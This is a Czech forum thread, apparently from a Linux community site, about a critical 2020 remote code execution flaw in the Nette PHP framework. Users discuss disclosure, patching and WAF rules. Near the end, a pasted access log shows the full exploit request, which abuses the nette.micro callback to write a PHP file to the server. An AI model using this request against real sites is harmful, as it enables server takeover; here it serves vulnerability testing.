Bezpečnostní chyba v Nette

Nechci zveřejňovat přesný postup zneužití chyby a doufám, že to ani nikdo jiný neudělá.

Tohle je pro mne bezcenný článek a zprávička. Těšil jsem se, že se dozvím detaily a třeba i na co si dávat pozor, ale nic.

Pokud jde o uživatele Nette, tak k těm, to snad doputuje jako normální bezpečnostní aktualizace případně e-mailem.

Když už psát články a zprávičky, tak ať se z toho člověk aspoň něco naučí – tzn. rozbor, jak chyba funguje, proč k ní došlo a jak ji příště neopakovat. Stejně tak by se hodilo napsat, jakou metodu použil ten, kdo chybu objevil (jestli používal nějaký automatický software na hledání chyb, nebo jestli automatizovaně analyzoval zdrojáky nebo jestli to hledal ručně…).

Alespoň ne v dohledné době, protože by tím způsobil ostatním nepříjemnosti a zpronevěřil se duchu open source.

Tohle píše člověk, který tvrdí, že open source je komunismus a nefunguje…

Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-DK, Relational pipes

4.10.2020 00:46 trekker.dk | skóre: 72
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Nebo jestli třeba není něco, co by se dalo nakrmit do mod_security, a ochránit tak weby lidí, co si to v životě neaktualizují.

Quando omni flunkus moritati

4.10.2020 07:28 azurIt | skóre: 34 | blog: zatial_bez_mena
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Do nasho WAFu sme hned pridali blokujuce pravidlo. Autora Nette som v case, ked chybu zverejnil v mailing liste, kontaktoval s ponukou, aby mi pomohol dane pravidlo v modsecurity doladit (kedze nie som expert na interne fungovanie Nette) s tym, ze mu ho potom dam a on ho moze zdarma ponuknut svojim klientom/pouzivatelom. Vobec nereagoval.

7.10.2020 16:18 xkucf03 | skóre: 49 | blog: xkucf03
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Dle #18 by mělo stačit zablokovat jedno URL nebo URL odpovídající jednomu regulárnímu výrazu. Což se dá udělat na nějaké společné reverzní proxy nebo v tom ModSecurity. Tedy alespoň pokud tento GET požadavek je jediný způsob, jak tuto chybu zneužít.

Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-DK, Relational pipes

4.10.2020 06:24 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Jn. Kdyby to někdo chtěl reverzovat z patche, tak tady je to dobře izolované.

Tak jsem to rychle omrkl a jedna se o neosetreny vstup do call_user_func_array pri pouziti App\Presenters\MicroPresenter jako rodice presenteru aplikace...
Takze aplikace pouzivajci plnotucny Nette\Application\UI\Presenter by mely byt ?ok?
Taky moc nechapu tu snahu o utajeni detailu chyby, chyba je tak tristni a neni problem najit jeji opravu v diffu... tim myslim ze kdokoliv ma schopnosti danou chybu zneuzit bude take automaticky mit schopnosti si ji dohledat a pochopit jak se da zneuzit...

Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.

5.10.2020 05:38 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Tak oprava... neni v bezpeci zadna instalace Nette... App\Presenters\MicroPresenter se da spustit i kdyz z nej zadny pouzivany presenter nededi... da se hacknout temer vetsina nette instalaci pres blbej GET request... zrovna jsem si z hecu hackl par mych projektu v produkci... Tak se dneska asi nevyspim... fuck

Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.

5.10.2020 12:34 vencis
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Muzes sem dat ten GET request ?

5.10.2020 14:27 Gabron
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Take bych to rad odzkousel. Mohl by jsi to postnout? Mam par projektu na kterych se mi zda, ze dira neni...?

5.10.2020 20:54 ~~°;;{[ 1337 h4xX0Rr ]};;°~~
Rozbalit Rozbalit vše Re: Bezpečnostní informační služba hledá nové pracovníky se specializací na nelegální ruskou fonografii

Napiš sem URL těch projektů, já ti to pořádně votestuju!

6.10.2020 17:05 uhel
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Klobasa nic nema. Jen haze plky chytrolin.

7.10.2020 14:47 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Mam udelany i testovaci script... ale nez pustim nejake detaily, chci tomu dat jeste cas az si lidi stihnout opravit svuj shit

Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.

6.10.2020 21:07 survik1
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Potvrzuji, že chyba je ve všech app bez ohledu na (ne)používání MicroPresenteru. GET request zde dávat nebudu, není potřeba, aby byly příkazy takhle lehce dohledatelný. Kód každopádně umožňuje i kompletní ovládnutí pc ... Takže aktulizujte a aktulizujte, tohle je fakt průser.

6.10.2020 22:21 David Grudl
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Před lety jsem se totálně zboural, a pak dostal neodolatelnou chuť jít něco doprogramovat v Nette. Jsou chvíle, které provozovatelům webů fakt nezávidím.

7.10.2020 16:07 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Ahoj, udelal jsem testovaci script pro jednoduche overeni

https://salamek.cz/nette-test.php?url=https://cvc.cz

misto https://cvc.cz dej domenu sveho webu

Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.

7.10.2020 20:23 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Kdo nemá nasetupovanej webserver s access logem a chce vidět co to dělá:

78.80.161.207 ceskaprehrada.cz - [07/Oct/2020:20:22:15 +0200] "GET /nette.micro?callback=file_put_contents&filename=delete_me_96c9ce10c6293b869039493c9d727263.php&data=%3C%3Fphp+echo+base64_decode%28%27OTZjOWNlMTBjNjI5M2I4NjkwMzk0OTNjOWQ3MjcyNjM%3D%27%29%3B+%40unlink%28%27delete_me_96c9ce10c6293b869039493c9d727263.php%27%29%3B+%2F%2FNette+CVE-2020-15227+test+tool+https%3A%2F%2Fsalamek.cz%2Fnette-test.php%2C+if+you+see+this+file%2C+you+should+update+nette%2Fapplication+ASAP HTTP/1.0" 404 341 "-" "-"
78.80.161.207 ceskaprehrada.cz - [07/Oct/2020:20:22:15 +0200] "GET /delete_me_96c9ce10c6293b869039493c9d727263.php HTTP/1.0" 404 341 "-" "-"

7.10.2020 20:27 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Pozn. nevím jestli to není klam a další stage nepřijde když na to první nějak konkrétně odpovím :-)

, instalovat Nette se mi kvůli tomu fakt nechce (používal jsem jenom samostatné Nette Form. Taky nevím co se stane když nemáte rewrite na tu URL.

Dále jsem prošel access log a nikdo nic s "nette" nepožadoval, takže nevypadá, že by se to masově skenovalo.

8.10.2020 14:46 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Na dalsi stage se jde vzdy... odpoved je dulezita protoze kdyz je hack uspesny app spadne do 500 a jakmile na to budes "odpovidat jinak" tak to znamena ze jsi tomu hacku uspesne zabranil tak jako tak... Samozrejme ten test neni 100% pocita totiz se zapnutymi "nice urls" a defaultnim formatem nice urls v nette... Mohl bych to jeste upravit a pouzivat nazev presenteru v get parametru...

Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.

8.10.2020 21:03 Bherzet | skóre: 19 | blog: Bherzetův blog
Rozbalit Rozbalit vše Re: Bezpečnostní chyba v Nette

Tak to stihl zazáplatovat dokonce i u Vaška (kontext [1, 2], kdyby někdo nevěděl).

Bezpečnostní chyba v Nette

Komentáře